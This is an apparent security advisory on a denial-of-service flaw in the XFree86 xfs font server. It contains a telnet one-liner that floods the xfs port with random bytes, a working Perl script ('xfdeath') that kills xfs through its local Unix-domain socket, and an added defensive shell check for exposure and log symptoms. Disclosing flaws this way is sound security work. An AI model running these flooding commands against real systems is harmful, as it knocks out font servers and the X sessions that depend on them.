COMMAND

    xfs

SYSTEMS AFFECTED

    Linux

PROBLEM

    xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm) on RedHat 7.0
    seems to be vulnerable to a denial-of-service attack. To make xfs
    stop responding to requests, try the following:

        $ telnet victim xfs </dev/urandom

    Repeat about 100 (or 1000) times and you get a Connection refused
    message.

    Regular X servers can then no longer connect to the font server;
    they usually crash, stating "Could not open default font 'fixed'",
    and will probably get disabled for 5 minutes if run from inittab.

    Valentine M. Smith found this originally. Since then, this has
    been confirmed on Mandrake 8.0 as well.

    The TCP attack against the font server is (obviously) only
    applicable to font servers listening on TCP (which is probably
    only the case for systems serving X terminals).

    If we want to kill a font server running on the
    Mandrake/Redhat/whatever *default* setup, we have to send the
    garbage to the Unix-domain socket instead.

        [user@userland ~]$ ps -ax|grep xfs
        3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
        3723 pts/2    S      0:00 grep xfs
        
        [user@userland ~]$./xfdeath
        
        [user@userland ~]$ ps -ax|grep xfs
        3780 pts/1    S      0:00 grep xfs
        
        [user@userland ~]$cat xfdeath
        #!/usr/bin/perl -w
        use Socket;
        use strict;
        my ($grab, $line, $garbagebyte,$i,$STOP);
        sub darned {
        $STOP=1;
        }
        open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
        $SIG{'PIPE'} = 'darned';
        for ($i = 0; $i < 1000; ++$i)
        {
        $STOP=0;
        $grab = shift || '/tmp/.font-unix/fs-1';
        socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0)  || die "socket: $!";
        connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
        while (!$STOP) {
        read(GARBAGE, $garbagebyte, 1);
        print ".";
        print A_SOCKET $garbagebyte;
        }
        }
        exit;
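
    To tell which of the two paths above applies to a host (remote TCP
    or local Unix-domain socket only) and to spot the symptoms described
    in system logs, the following check can be used. It is an added
    example, not part of the original advisory. The function names and
    sample inputs are constructed, the init log wording is assumed to be
    sysvinit's usual message, and 7100 is assumed as the xfs default port.

```shell
#!/bin/sh
# Added example (not from the advisory): classify how an xfs instance is
# reachable and count the failure symptoms the advisory describes.

# xfs_exposure "<xfs command line>"
# Prints "unix-only" when TCP is disabled with "-port -1" (as in the ps
# output above), otherwise "tcp:<port>". Assumes 7100 when no -port is given.
xfs_exposure() {
    port=7100
    set -- $1                      # split the command line into words
    while [ $# -gt 0 ]; do
        if [ "$1" = "-port" ] && [ $# -ge 2 ]; then
            port=$2                # value following -port
            shift
        fi
        shift
    done
    if [ "$port" = "-1" ]; then
        echo "unix-only"           # still reachable by local users
    else
        echo "tcp:$port"           # reachable over the network
    fi
}

# xfs_dos_symptoms < logfile
# Counts log lines showing the X server failing to open font 'fixed' or
# init disabling a respawning entry for 5 minutes.
xfs_dos_symptoms() {
    grep -c -i -e "could not open default font 'fixed'" \
               -e "respawning too fast: disabled for 5 minutes" || true
}

# Constructed sample inputs (not real captures).
SAMPLE_PS_DEFAULT='xfs -port -1 -daemon -user xfs'
SAMPLE_PS_TCP='xfs -port 7100 -daemon -user xfs'
SAMPLE_LOG="Fatal server error:
could not open default font 'fixed'
INIT: Id \"x\" respawning too fast: disabled for 5 minutes
xfs: unrelated line"

echo "default setup: $(xfs_exposure "$SAMPLE_PS_DEFAULT")"
echo "tcp setup:     $(xfs_exposure "$SAMPLE_PS_TCP")"
echo "symptom lines: $(printf '%s\n' "$SAMPLE_LOG" | xfs_dos_symptoms)"
```

    A "unix-only" result narrows the exposure to local users, since the
    Unix-domain socket remains reachable as shown above.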

SOLUTION

    Nothing yet.